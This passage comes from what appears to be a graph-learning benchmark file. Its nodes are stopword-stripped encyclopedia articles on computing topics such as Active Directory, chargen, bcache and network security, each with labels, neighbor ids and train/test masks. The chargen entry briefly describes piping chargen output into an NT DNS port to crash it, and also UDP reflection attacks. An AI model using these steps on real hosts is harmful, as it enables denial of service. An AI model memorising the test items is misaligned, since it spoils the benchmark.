ad cs predates windows server 2008 name simply certificate services ad cs requires ad ds infrastructure active directory federation services ad fs single sign-on service ad fs infrastructure place users may use several web-based services e.g internet forum blog online shopping webmail network resources using one set credentials stored central location opposed granted dedicated set credentials service ad fs purpose extension ad ds latter enables users authenticate use devices part network using one set credentials former enables use set credentials different network name suggests ad fs works based concept federated identity ad fs requires ad ds infrastructure although federation partner may active directory rights management services ad rms known rights management services rms windows server 2008 server software information rights management shipped windows server uses encryption form selective functionality denial limiting access documents corporate e-mails microsoft word documents web pages operations authorized users perform directory service active directory instance consists database corresponding executable code responsible servicing requests maintaining database executable part known directory system agent collection windows services processes run windows 2000 later objects active directory databases accessed via ldap adsi component object model interface messaging api security accounts manager services active directory structures arrangements information objects objects fall two broad categories resources e.g. printers security principals user computer accounts groups security principals assigned unique security identifiers sids object represents single entity—whether user computer printer group—and attributes certain objects contain objects object uniquely identified name set attributes—the characteristics information object represents— defined schema also determines kinds objects stored active directory schema object lets administrators extend modify schema necessary however schema object integral definition active directory objects deactivating changing objects fundamentally change disrupt deployment schema changes automatically propagate throughout system created object deactivated—not deleted changing schema usually requires planning active directory framework holds objects viewed number levels forest tree domain logical divisions active directory network within deployment objects grouped domains objects single domain stored single database replicated domains identified dns name structure namespace domain defined logical group network objects computers users devices share active directory database tree collection one domains domain trees contiguous namespace linked transitive trust hierarchy top structure forest forest collection trees share common global catalog directory schema logical structure directory configuration forest represents security boundary within users computers groups objects accessible objects held within domain grouped organizational units ous ous provide hierarchy domain ease administration resemble organization structure managerial geographical terms ous contain ous—domains containers sense microsoft recommends using ous rather domains structure simplify implementation policies administration ou recommended level apply group policies active directory objects formally named group policy objects gpos although policies also applied domains sites see ou level administrative powers commonly delegated delegation performed individual objects attributes well organizational units separate namespace consequence compatibility legacy netbios implementations user accounts identical samaccountname allowed within domain even accounts objects separate ous samaccountname user object attribute must unique within domain.. however two users different ous common name cn name stored directory fred.staff-ou.domain fred.student-ou.domain staff-ou student-ou ous general reason lack allowance duplicate names hierarchical directory placement microsoft primarily relies principles netbios flat-file method network object management microsoft software goes way back windows nt 3.1 ms-dos lan manager allowing duplication object names directory completely removing use netbios names would prevent backward compatibility legacy software equipment however disallowing duplicate object names way violation ldap rfcs active directory supposedly based number users domain increases conventions first initial middle initial last name western order reverse eastern order fail common family names like li 李 smith garcia workarounds include adding digit end username alternatives include creating separate id system unique employee/student id numbers use account names place actual user names allowing users nominate preferred word sequence within acceptable use policy duplicate usernames exist within domain account name generation poses significant challenge large organizations easily subdivided separate domains students public school system university must able use computer across network microsoft active directory ous confer access permissions objects placed within ous automatically assigned access privileges based containing ou design limitation specific active directory competing directories novell nds able assign access privileges object placement within ou active directory requires separate step administrator assign object ou member group also within ou relying ou location alone determine access permissions unreliable object may assigned group object ou common workaround active directory administrator write custom powershell visual basic script automatically create maintain user group ou directory scripts run periodically update group match ou account membership unable instantly update security groups anytime directory changes occurs competing directories security directly implemented directory groups known shadow groups created shadow groups selectable place ou administrative tools microsoft refers shadow groups server 2008 reference documentation explain create built-in server methods console snap-ins managing shadow groups division organization information infrastructure hierarchy one domains top-level ous key decision common models business unit geographical location service object type hybrids ous structured primarily facilitate administrative delegation secondarily facilitate group policy application although ous form administrative boundary true security boundary forest administrator domain forest must trusted across domains forest active directory database organized partitions holding specific object types following specific replication pattern microsoft often refers partitions 'naming contexts 'schema partition contains definition object classes attributes within forest 'configuration partition contains information physical structure configuration forest site topology replicate domains forest 'domain partition holds objects created domain replicates within domain sites physical rather logical groupings defined one ip subnets ad also holds definitions connections distinguishing low-speed e.g. wan vpn high-speed e.g. lan links site definitions independent domain ou structure common across forest sites used control network traffic generated replication also refer clients nearest domain controllers dcs microsoft exchange server 2007 uses site topology mail routing policies also defined site level physically active directory information held one peer domain controllers replacing nt pdc/bdc model dc copy active directory servers joined active directory domain controllers called member servers subset objects domain partition replicate domain controllers configured global catalogs global catalog gc servers provide global listing objects forest global catalog servers replicate objects domains hence provide global listing objects forest however minimize replication traffic keep gc database small selected attributes object replicated called partial attribute set pas pas modified modifying schema marking attributes replication gc earlier versions windows used netbios communicate active directory fully integrated dns requires tcp/ip—dns fully functional dns server must support srv resource records also known service records active directory synchronizes changes using multi-master replication replication default 'pull rather 'push meaning replicas pull changes server change effected knowledge consistency checker kcc creates replication topology site links using defined sites manage traffic intrasite replication frequent automatic result change notification triggers peers begin pull replication cycle intersite replication intervals typically less frequent use change notification default although configurable made identical intrasite replication link 'cost e.g. ds3 t1 isdn etc kcc alters site link topology accordingly replication may occur transitively several site links same-protocol site link bridges cost low although kcc automatically costs direct site-to-site link lower transitive connections site-to-site replication configured occur bridgehead server site replicates changes dcs within site replication active directory zones automatically configured dns activated domain based site replication active directory uses remote procedure calls rpc ip rpc/ip sites smtp used replication changes schema configuration partial attribute set global catalog gcs smtp used replicating default domain partition general network utilizing active directory one licensed windows server computer backup restore active directory possible network single domain controller microsoft recommends one domain controller provide automatic failover protection directory domain controllers also ideally single-purpose directory operations run software role certain microsoft products sql server exchange interfere operation domain controller necessitating isolation products additional windows servers combining make configuration troubleshooting either domain controller installed software difficult business intending implement active directory therefore recommended purchase number windows server licenses provide least two separate domain controllers optionally additional domain controllers performance redundancy separate file server separate exchange server separate sql server forth support various server roles physical hardware costs many separate servers reduced use virtualization although proper failover protection microsoft recommends running multiple virtualized domain controllers physical hardware active-directory database directory store windows 2000 server uses jet blue-based extensible storage engine ese98 limited 16 terabytes 2 billion objects 1 billion security principals domain controller database microsoft created ntds databases 2 billion objects nt4 security account manager could support 40,000 objects called ntds.dit two main tables data table link table windows server 2003 added third main table security descriptor single instancing programs may access features active directory via com interfaces provided active directory service interfaces allow users one domain access resources another active directory uses trusts trusts inside forest automatically created domains created forest sets default boundaries trust implicit transitive trust automatic domains within forest microsoft active directory management tools include management tools may provide enough functionality efficient workflow large environments third-party solutions extend administration management capabilities provide essential features convenient administration processes automation reports integration services etc varying levels interoperability active directory achieved unix-like operating systems including unix linux mac os x java unix-based programs standards-compliant ldap clients systems usually interpret many attributes associated windows components group policy support one-way trusts third parties offer active directory integration unix-like platforms including schema additions shipped windows server 2003 r2 include attributes map closely enough rfc 2307 generally usable reference implementation rfc 2307 nss_ldap pam_ldap provided padl.com support attributes directly default schema group membership complies rfc 2307bis proposed windows server 2003 r2 includes microsoft management console snap-in creates edits attributes alternative option use another directory service non-windows clients authenticate windows clients authenticate ad non-windows clients include 389 directory server formerly fedora directory server fds viewds identity solutions viewds v7.2 xml enabled directory sun microsystems sun java system directory server latter two able perform two-way synchronization ad thus provide deflected integration another option use openldap translucent overlay extend entries remote ldap server additional attributes stored local database clients pointed local database see entries containing remote local attributes remote database remains completely untouched administration querying modifying monitoring active directory achieved via many scripting languages including powershell vbscript jscript/javascript perl python ruby free non-free ad administration tools help simplify possibly automate ad management tasks since october 2017 amazon aws offers integration microsoft active directory",
    "neighbors": [
      8192,
      2564,
      517,
      11270,
      5643,
      4624,
      9744,
      11283,
      537,
      3610,
      540,
      9245,
      3102,
      6686,
      9762,
      8227,
      8740,
      3109,
      1577,
      10281,
      5166,
      2101,
      8757,
      11320,
      10812,
      1086,
      3648,
      582,
      10310,
      1098,
      7754,
      3660,
      4173,
      4174,
      10828,
      7248,
      9808,
      4178,
      10831,
      10839,
      5721,
      603,
      5723,
      9819,
      3170,
      10338,
      617,
      622,
      9839,
      4210,
      7796,
      5749,
      9844,
      1656,
      6265,
      7290,
      4731,
      8315,
      10366,
      639,
      10879,
      8841,
      651,
      3723,
      6797,
      2193,
      9874,
      3732,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      168,
      5287,
      5800,
      6827,
      2221,
      9904,
      5300,
      9909,
      7351,
      10428,
      2749,
      4289,
      2244,
      8391,
      200,
      3784,
      7368,
      9420,
      1741,
      10957,
      7891,
      9429,
      2782,
      736,
      1761,
      2786,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      5357,
      10993,
      3834,
      1791,
      8959,
      11519,
      4356,
      11524,
      6411,
      782,
      3856,
      1297,
      8976,
      5397,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      5407,
      9505,
      7970,
      5413,
      1832,
      3881,
      5928,
      10024,
      10026,
      10029,
      10542,
      7983,
      3890,
      1844,
      9525,
      1334,
      823,
      10039,
      5433,
      9530,
      5435,
      6972,
      11572,
      6462,
      3394,
      2887,
      4423,
      9033,
      10058,
      6990,
      847,
      6993,
      3922,
      2901,
      11605,
      4439,
      5465,
      8539,
      7519,
      5472,
      11103,
      2402,
      7010,
      2919,
      4458,
      6506,
      8554,
      9066,
      5492,
      9593,
      3450,
      2943,
      2944,
      11135,
      3462,
      8582,
      1418,
      5003,
      5004,
      5517,
      1935,
      2959,
      8080,
      3477,
      4505,
      3482,
      9625,
      11677,
      11683,
      6565,
      3496,
      430,
      6062,
      7087,
      10673,
      6579,
      9655,
      5048,
      6584,
      1978,
      960,
      7106,
      8132,
      6088,
      969,
      9166,
      3535,
      6098,
      2515,
      4051,
      8659,
      11221,
      1498,
      5594,
      478,
      8159,
      6114,
      6115,
      5093,
      8681,
      4074,
      2027,
      6637,
      9709,
      6641,
      3573,
      3064,
      6651,
      10238
    ],
    "mask": "Test"
  },
  {
    "node_id": 930,
    "label": 2,
    "text": "Behdad_Esfahbod:behdad esfahbod seyed behdad esfahbod mirhosseinzadeh sarabi born september 27 1982 iranian-canadian software engineer free software developer software engineer facebook since february 2019 senior staff software engineer google since 2010 red hat esfahbod holds mba university toronto rotman school management master science degree university toronto computer science bachelor science degree sharif university computer engineering software high school esfahbod silver 1999 international olympiad informatics gold 2000 esfahbod among founders sharif farsiweb inc. carried internationalization standardization projects related open source persian language director gnome foundation 2007 2010 serving president 2008 2009 esfahbod expert font engineering internationalization frequent speaker workshops conferences contributed many open-source projects among projects led cairo fontconfig harfbuzz pango libraries standard parts gnome desktop environment google chrome web browser libreoffice suite programs received o'reilly open source award 2013 work harfbuzz",
    "neighbors": [
      3189,
      9455
    ],
    "mask": "None"
  },
  {
    "node_id": 931,
    "label": 4,
    "text": "Active_defense:active defense active defense refer defensive strategy military cybersecurity arena department defense defines active defense employment limited offensive action counterattacks deny contested area position enemy definition specify whether refers physical actions cyber-related actions cybersecurity arena active defense may mean asymmetric defenses namely defenses increase costs cyber-adversaries reducing costs cyber-defenders example active defense data protection strategy invented cryptomove leverages dynamic data movement distribution re-encryption make data harder attack steal destroy prior data protection approaches relied encryption data rest leaves data vulnerable attacks including stealing ciphertext cryptographic attack attacks encryption keys destruction encrypted data ransomware attacks insider attacks others three acm computing conferences explored moving target defense strategy network application-level security well instance rotating ip addresses dynamically changing network topologies production implementations mtd provided companies dispel applications including legacy systems communications election security defined active defenses including deception honeypots seek confuse attackers traps advanced forensics examples honeypot technologies include illusive networks trapx cymmetria attivo others types active defenses might include automated incident response attempts tie together different response strategies order increase work attackers decrease work defenders recently department homeland security financial institutions identified active defense top priority security industrial infrastructure systems part broader push greater resiliency national institute standards technology 800-160 volume 2 framework gone providing guidance standardization active defense",
    "neighbors": [
      9256,
      1970,
      3629,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 932,
    "label": 9,
    "text": "RascalMPL:rascalmpl rascal experimental domain specific language metaprogramming static code analysis program transformation implementation domain specific languages general meta language sense bias particular software language includes primitives relational calculus term rewriting syntax semantics based procedural imperative functional programming",
    "neighbors": [
      4293,
      4263,
      4519,
      10474,
      7983,
      11475,
      4980,
      5492,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 933,
    "label": 5,
    "text": "Character_Generator_Protocol:character generator protocol character generator protocol chargen service internet protocol suite defined 1983 jon postel intended testing debugging measurement purposes protocol rarely used design flaws allow ready misuse host may connect server supports character generator protocol either transmission control protocol tcp user datagram protocol udp port number 19 upon opening tcp connection server starts sending arbitrary characters connecting host continues host closes connection udp implementation protocol server sends udp datagram containing random number 0 512 characters every time receives datagram connecting host data received server discarded unix-like operating systems chargen server built inetd xinetd daemon chargen service usually enabled default may enabled adding following lines file /etc/inetd.conf telling inetd reload configuration chargen service may used source byte-stream debugging tcp network code proper bounds checking buffer management may also source generic payload bandwidth measurement and/or qos fine-tuning although consideration must given hardware compression active output chargen service easily efficiently compressed compression cause bandwidth tests report size data decompression instead actual amount data passed wire typical chargen service session looks like user connects host using telnet client user receives stream bytes although specific format output prescribed recommended pattern de facto standard shifted lines 72 ascii characters repeating continues tcp connection closed shown trace ending telnet session service used maliciously crash microsoft domain name servers dns running windows nt 4.0 piping arbitrary characters straight dns server listening port telnet ntbox 19 telnet ntbox 53 however attack may symptom improper buffer management part microsoft dns service directly related chargen service udp chargen commonly used denial-of-service attacks using fake source address attacker send bounce traffic udp chargen application victim udp chargen sends 200 1,000 times data receives depending upon implementation traffic multiplication also attractive attacker obscures attacker ip address victim chargen widely implemented network-connected printers printer firmware rarely updated older models chargen security concerns known may still many network-connected printers implement protocol visible internet invariably misused denial service vectors potential attackers often scan networks looking udp port 19 chargen sources notorious availability chargen printers distributed denial service trojans use udp port 19 attack traffic supposed aim throw investigators track looking old printers rather subverted computers",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      4495,
      3218,
      5397,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      3750,
      3751,
      3752,
      9381,
      10924,
      562,
      3250,
      2996,
      9909,
      6651,
      10171,
      3133,
      829,
      3006,
      4797,
      5181,
      5437,
      8386,
      7364,
      2887,
      8265,
      2509,
      4687,
      849,
      6993,
      5843,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10341,
      871,
      10344,
      2409,
      11112,
      367,
      8432,
      891
    ],
    "mask": "None"
  },
  {
    "node_id": 934,
    "label": 2,
    "text": "Sugar_(software):sugar software sugar free open-source desktop environment designed interactive learning children copyright sugarlabs developed part one laptop per child olpc project sugar default interface olpc xo-1 laptop computers olpc xo-1.5 later provided option either gnome sugar interfaces sugar available live cd live usb package installable several linux distributions run linux virtual machine windows mac os unlike desktop environments sugar use desktop folder window metaphors instead sugar default full-screen activities require users focus one program time sugar implements journal automatically saves user running program session allows later use interface pull past works date activity used file type sugar objective suitable even inexperienced users provides advanced facilities experienced project stated goal avoid bloated interfaces limit controls immediately relevant task hand. applications run full screen double-clicking used menus show icons sugar written python interpreted language modified users programming experience desktop environments used many operating systems written compiled languages c. applications developed sugar pragmatic offers number opportunity avail enhances skills make dexterous field.sugar activities include turle blocks 3d ruler recall many hundreds learning activities sugar downloaded sugar activity library additional activities available third parties project ceibal portal uruguay may 2006 sugar developers described primarily tool expression plans place include multimedia social networking features since may 2008 sugar developed umbrella sugar labs member project software freedom conservancy contributors employed one laptop per child related organizations others volunteers many cases associated free software community contributors original sugar platform included marco pesenti gritti walter bender christopher blizzard eben eliason simon schampijer christian schmidt lisa strausfeld takaaki okada tomeu vizoso dan williams early 2007 sugar could installed difficulty several linux distributions virtual machines operating systems mid-2008 sugar available debian ubuntu fedora distributions linux e.g. ubuntu 8.04 hardy heron sugar could installed official ubuntu universe repositories mid-2009 sugar also available opensuse linux distributions sugar 0.82.1 included olpc system software release 8.2.0 xo-1 laptops sugar 0.86 released september 30 2009 sugar 0.88 released march 31 2010 sugar 0.90.0 released october 2010 three releases 2011 one june 2012 included support arm architecture xo 1.75 builds olpc xo laptops release schedule available os releases sugar unofficially ported run android firefox os ios using html5 javascript project name sugarizer additional clients written web browsers supporting html5 sugar learning platform linux available usb-bootable linux distribution sugar stick software components forming installable additional desktop environment linux distributions installed using fedora live usb creator installed onto computer hard disk using codice_1 command sugar terminal console june 23 2009 sugar labs announced availability download sugar stick v1 strawberry run bootable 1gb usb flash drive july 23 2009 recycle usb.com went live program reflash used usb keys sugar software donate schools december 8 2009 sugar labs announced availability sugar stick v2 blueberry incorporates sugar release 0.86 fedora 11 sugar labs announced availability sugar stick v3 mirabelle incorporates sugar release 0.88 fedora 13 since mirabelle sugar stick regular semi-annual fedora spin official special-purpose version fedora spin using fedora v22 released 26 may 2015 olpc xo-1 1 gb nand flash drive 256 mb memory flash-based hard drive small swap added using sd card network block device many activities loaded time may performance problems due low memory processor load sugar many sugar run raspberry pi recommended use soas run sugar one learn run sugar raspberry pi sugar lab website sugar stick strawberry release based latest updates june 22 2009 features sugar learning environment namely version 0.84 including 40 activities enrich learning experience hundreds activities available download sugar activity library release includes fedora updates sugar features like view source file transfer supplementary sample content available journal usability improvements sugar stick v2 blueberry released 8 december 2009 based version fedora operating system contains number features improve overall user learning experience overview notable ones mirabelle 3rd release sugar stick project released 25 may 2010 mango lassi 4th version sugar stick released 2 november 2010 uses sugar version 0.90 5th version sugar stick released 9 october 2011 uses sugar version 0.92 6th version sugar stick released 8 november 2011 uses sugar version 0.94.1 7th version sugar stick released 29 may 2012 uses sugar version 0.96.1 8th version sugar stick released 15 january 2013 uses sugar version 0.98.2 9th version sugar stick released 2 july 2013 uses sugar version 0.98.8 10th version sugar stick released 17 december 2013 uses sugar version 0.100.0 sugar stopped giving official names soas releases however continues create new versions fedora release latest version sugar 0.112 sugar released latest versions latest fedoras fedora 23 fedora 24 fedora 25 fedora 26 fedora 27 sugarizer html javascript based application allows using sugar functionality device available web application mobile app offers similar user interface includes features sugar core datastore journal well many sugar activities",
    "neighbors": [
      3462,
      9223,
      8076,
      5395,
      3613,
      4637,
      7325,
      7983,
      823,
      1089,
      219,
      735,
      4841,
      8554,
      9579,
      9964,
      8304,
      8177,
      2045,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 935,
    "label": 2,
    "text": "Bcache:bcache bcache abbreviated block cache cache linux kernel block layer used accessing secondary storage devices allows one fast storage devices flash-based solid-state drives ssds act cache one slower storage devices hard disk drives hdds effectively creates hybrid volumes provides performance improvements designed around nature performance characteristics ssds bcache also minimizes write amplification avoiding random writes turning sequential writes instead merging i/o operations performed cache primary storage helping extending lifetime flash-based devices used caches improving performance write-sensitive primary storages raid 5 sets bcache licensed gnu general public license gpl kent overstreet primary developer using bcache makes possible ssds another level indirection within data storage access paths resulting improved overall performance using fast flash-based ssds caches slower mechanical hard disk drives hdds rotational magnetic media way gap ssds hdds bridged costly speed ssds gets combined cheap storage capacity traditional hdds caching implemented using ssds storing data associated performed random reads random writes using near-zero seek times prominent feature ssds sequential i/o cached avoid rapid ssd cache invalidation operations already suitable enough hdds going around cache big sequential writes known write-around policy caching sequential i/o also helps extending lifetime ssds used caches write amplification avoided performing random writes ssds instead random writes ssd caches always combined block-level writes ending rewriting complete erase blocks ssds write-back write-through default policies supported caching write operations case write-back policy written data stored inside ssd caches first propagated hdds later batched way performing seek-friendly operations making bcache act also i/o scheduler write-through policy ensures write operation marked finished data requested written reached ssds hdds performance improvements reduced effectively performing caching written data write-back policy batched writes hdds provides additional benefits write-sensitive redundant array independent disks raid layouts raid 5 raid 6 perform actual write operations atomic read-modify-write sequences way performance penalties small random writes reduced avoided raid layouts grouping together performing batched sequential writes caching performed bcache operates block device level making file system–agnostic long file system provides embedded universally unique identifier uuid requirement satisfied virtually standard linux file systems well swap partitions sizes logical blocks used internally bcache caching extents go size single hdd sector bcache first announced kent overstreet july 2010 completely working linux kernel module though early beta stage development continued almost two years may 2012 point bcache reached production-ready state merged linux kernel mainline kernel version 3.10 released june 30 2013 overstreet since developing file system bcachefs based ideas first developed bcache said began evolving ... full blown general-purpose posix filesystem describes bcache prototype ideas became bcachefs intends bcachefs replace bcache officially announced bcachefs 2015 2018 submitting consideration inclusion mainline linux kernel version 3.10 linux kernel following features provided bcache following new features planned future releases bcache",
    "neighbors": [
      4616,
      3082,
      5139,
      6675,
      7187,
      10776,
      25,
      10780,
      4637,
      5661,
      10272,
      10785,
      3618,
      9762,
      6180,
      5158,
      7217,
      8242,
      9266,
      9784,
      10809,
      10811,
      576,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      10333,
      97,
      6244,
      5222,
      10856,
      8298,
      4207,
      7285,
      9335,
      2168,
      1147,
      5244,
      3197,
      4734,
      1150,
      11391,
      2179,
      7812,
      10883,
      8326,
      8328,
      6797,
      4238,
      7821,
      10382,
      2195,
      9366,
      2711,
      6296,
      6808,
      9882,
      7325,
      1694,
      9887,
      2723,
      8364,
      3248,
      6837,
      10933,
      5815,
      5822,
      5824,
      8388,
      1736,
      2762,
      9932,
      8909,
      5840,
      6352,
      7382,
      8410,
      10971,
      4831,
      8928,
      1761,
      1253,
      2278,
      233,
      4841,
      7403,
      10482,
      5363,
      2294,
      8439,
      2809,
      2811,
      7938,
      10499,
      4360,
      1291,
      1804,
      4367,
      273,
      11539,
      1813,
      792,
      10016,
      2339,
      295,
      2345,
      7983,
      823,
      6968,
      4409,
      7992,
      7483,
      318,
      11075,
      3911,
      4423,
      6988,
      10063,
      5457,
      11601,
      4438,
      5975,
      11095,
      2395,
      10590,
      1378,
      8551,
      10091,
      5492,
      7540,
      1400,
      8573,
      1406,
      8066,
      900,
      394,
      3978,
      5514,
      4493,
      7057,
      11155,
      11667,
      5013,
      9621,
      1431,
      8602,
      8092,
      11678,
      7584,
      1444,
      421,
      1445,
      9637,
      4521,
      4011,
      9646,
      1456,
      11184,
      1972,
      6075,
      9660,
      6078,
      9151,
      9667,
      8136,
      457,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      6128,
      5105,
      5619,
      2036,
      5620,
      8186,
      10235,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 936,
    "label": 3,
    "text": "Predication_(computer_architecture):predication computer architecture computer science predication architectural feature provides alternative conditional transfer control implemented machine instructions conditional branch conditional call conditional return branch tables predication works executing instructions paths branch permitting instructions taken path modify architectural state instructions taken path permitted modify architectural state associated predicated predicate boolean value used instruction control whether instruction allowed modify architectural state computer programs contain conditional code executed specific conditions depending factors determined beforehand example depending user input majority processors simply execute next instruction sequence traditional solution insert branch instructions allow program conditionally branch different section code thus changing next step sequence sufficient designers began improving performance implementing instruction pipelining method slowed branches thorough description problems arose popular solution see branch predictor luckily one common patterns code normally relies branching elegant solution consider following pseudocode system uses conditional branching might translate machine instructions looking similar predication possible branch paths coded inline instructions execute others basic idea instruction associated predicate word used similarly usage predicate logic instruction executed predicate true machine code example using predication might look something like besides eliminating branches less code needed total provided architecture provides predicated instructions guarantee faster execution general dosomething dosomethingelse blocks code short enough predication simplest form partial predication architecture conditional move conditional select instructions conditional move instructions write contents one register another predicate value true whereas conditional select instructions choose two registers contents written third based predicate value generalized capable form full predication full predication set predicate registers storing predicates allows multiple nested sequential branches simultaneously eliminated instructions architecture register specifier field specify predicate register supplies predicate main purpose predication avoid jumps small sections program code increasing effectiveness pipelined execution avoiding problems cache also number subtle benefits predication primary drawback increased encoding space typical implementations every instruction reserves bitfield predicate specifying conditions instruction effect available memory limited embedded devices space cost prohibitive however architectures thumb-2 able avoid issue see detriments following predication effective paths balanced longest path frequently executed determining path difficult compile time even presence profiling information predicated instructions popular european computer designs 1950s including mailüfterl 1955 zuse z22 1955 zebra 1958 electrologica x1 1958 ibm acs-1 design 1967 allocated skip bit instruction formats cdc flexible processor 1976 allocated three conditional execution bits microinstruction formats hewlett-packard pa-risc architecture 1986 feature called nullification allowed instructions predicated previous instruction ibm power architecture 1990 featured conditional move instructions power successor powerpc 1993 dropped instructions digital equipment corporation alpha architecture 1992 also featured conditional move instructions mips gained conditional move instructions 1994 mips iv version sparc extended version 9 1994 conditional move instructions integer floating-point registers hewlett-packard/intel ia-64 architecture instructions predicated predicates stored 64 special-purpose predicate registers one predicate registers always true unpredicated instructions simply instructions predicated value true use predication essential ia-64 implementation software pipelining avoids need writing separated code prologs epilogs x86 architecture family conditional move instructions codice_1 codice_2 added architecture intel pentium pro 1995 processor codice_1 instructions copied contents source register destination register depending predicate supplied value flag register arm architecture original 32-bit instruction set provides feature called conditional execution allows instructions predicated one 13 predicates based combination four condition codes set previous instruction arm thumb instruction set 1994 dropped conditional execution reduce size instructions could fit 16 bits successor thumb-2 2003 overcame problem using special instruction effect supply predicates following four instructions 64-bit instruction set introduced armv8-a 2011 replaced conditional execution conditional selection instructions predication used cuda warps given cuda core executes code branch unmet condition commit results computed execution path",
    "neighbors": [
      5384,
      3854,
      10781,
      6818,
      3493,
      9126,
      8231,
      9003,
      10796,
      10669,
      2224,
      8501,
      9911,
      5948,
      2620,
      7997,
      2241,
      7234,
      3142,
      8523,
      9932,
      7505,
      7134,
      4332,
      9964,
      5358,
      8815,
      1776,
      8944,
      10734,
      499,
      2805,
      1399,
      3323,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 937,
    "label": 2,
    "text": "Comparison_of_Java_and_Android_API:comparison java android api article compares application programming interfaces apis virtual machines vms programming language java operating system android android applications written java-like language differences java api android api android run java bytecode traditional java virtual machine jvm instead dalvik virtual machine older versions android android runtime art newer versions compile code dalvik runs executable linkable format elf executables containing machine code java bytecode java archive jar files executed android devices instead java classes compiled proprietary bytecode format run dalvik compiled version thereof newer art specialized virtual machine vm designed android unlike java vms stack machines stack-based architecture dalvik vm register machine register-based architecture dalvik traits differentiate standard vms bytecode loaded dalvik virtual machine java bytecode due way dalvik loads classes impossible load library packages jar files different procedure must used load android libraries content underlying codice_1 file must copied application private internal storage area loaded case java se class android class allows retrieving system properties however mandatory properties defined java virtual machine meaning different meaning android example current versions android use latest java language libraries full graphical user interface gui frameworks apache harmony java implementation older versions used java 8 source code works latest version android made work older versions android default default output stream output anything developers encouraged use class logs strings logcat tool changed least honeycomb output log console also android use abstract window toolkit swing library user interfaces built using view objects android uses framework similar swing based rather s. however android widgets javabeans android application must provided widget creation android widget library support pluggable look feel architecture look feel android widgets must embedded widgets however limited ability exists set styles themes application contrary swing layout managers applied container widget android layout behavior encoded containers android includes small subset codice_8 package related classes",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      8413,
      9949,
      1255,
      8940,
      5872,
      7421,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      3380,
      5431,
      2875,
      3900,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      6057,
      5546,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      9714,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 938,
    "label": 3,
    "text": "List_of_MIPS_architecture_processors:list mips architecture processors list processors implement mips instruction set architecture sorted year process size frequency die area processors designed imagination technologies mips technologies others displays overview mips processors performance functionality versus capabilities recent mips aptiv families mips technologies acquired 17 december 2012 imagination technologies since following processors introduced imagination technologies warrior p-class cpu announced cpu ip cores comprising mips series5 ‘ warrior ’ family based mips32 release 5 mips64 release 6 come three classes performance features number companies licensed mips architecture developed processors",
    "neighbors": [
      4098,
      8327,
      8711,
      783,
      7445,
      9851,
      4124,
      6815,
      8481,
      8355,
      5028,
      6057,
      426,
      7852,
      8237,
      3511,
      2490,
      7234,
      1480,
      10316,
      6247,
      7911,
      6250,
      6252,
      6253,
      5358,
      1776,
      6256,
      5237,
      760,
      3451
    ],
    "mask": "Test"
  },
  {
    "node_id": 939,
    "label": 4,
    "text": "Network_security:network security network security consists policies practices adopted prevent monitor unauthorized access misuse modification denial computer network network-accessible resources network security involves authorization access data network controlled network administrator users choose assigned id password authenticating information allows access information programs within authority network security covers variety computer networks public private used everyday jobs conducting transactions communications among businesses government agencies individuals networks private within company others might open public access network security involved organizations enterprises types institutions title explains secures network well protecting overseeing operations done common simple way protecting network resource assigning unique name corresponding password network security starts authentication commonly username password since requires one detail authenticating user name—i.e. password—this sometimes termed one-factor authentication two-factor authentication something user 'has also used e.g. security token 'dongle atm card mobile phone three-factor authentication something user 'is also used e.g. fingerprint retinal scan authenticated firewall enforces access policies services allowed accessed network users though effective prevent unauthorized access component may fail check potentially harmful content computer worms trojans transmitted network anti-virus software intrusion prevention system ips help detect inhibit action malware anomaly-based intrusion detection system may also monitor network like wireshark traffic may logged audit purposes later high-level analysis newer systems combining unsupervised machine learning full network traffic analysis detect active network attackers malicious insiders targeted external attackers compromised user machine account communication two hosts using network may encrypted maintain privacy honeypots essentially decoy network-accessible resources may deployed network surveillance early-warning tools honeypots normally accessed legitimate purposes techniques used attackers attempt compromise decoy resources studied attack keep eye new exploitation techniques analysis may used tighten security actual network protected honeypot honeypot also direct attacker attention away legitimate servers honeypot encourages attackers spend time energy decoy server distracting attention data real server similar honeypot honeynet network set intentional vulnerabilities purpose also invite attacks attacker methods studied information used increase network security honeynet typically contains one honeypots security management networks different kinds situations home small office may require basic security large businesses may require high-maintenance advanced software hardware prevent malicious attacks hacking spamming order minimize susceptibility malicious attacks external threats network corporations often employ tools carry network security verifications networks subject attacks malicious sources attacks two categories passive network intruder intercepts data traveling network active intruder initiates commands disrupt network normal operation conduct reconnaissance lateral movement find gain access assets available via network types attacks include",
    "neighbors": [
      3072,
      2563,
      5636,
      10245,
      10756,
      9227,
      6159,
      9233,
      531,
      3093,
      4119,
      9242,
      28,
      3614,
      9761,
      2084,
      4648,
      9256,
      9771,
      10283,
      3629,
      46,
      1585,
      8753,
      2099,
      10291,
      10801,
      569,
      10297,
      571,
      3643,
      7739,
      9791,
      1088,
      4163,
      4165,
      2118,
      11333,
      8267,
      81,
      8789,
      9815,
      6232,
      4198,
      2154,
      107,
      10858,
      2158,
      3698,
      6262,
      10875,
      5245,
      5246,
      9345,
      6786,
      5764,
      11400,
      138,
      3724,
      2189,
      5774,
      9356,
      11409,
      4755,
      3732,
      4245,
      7828,
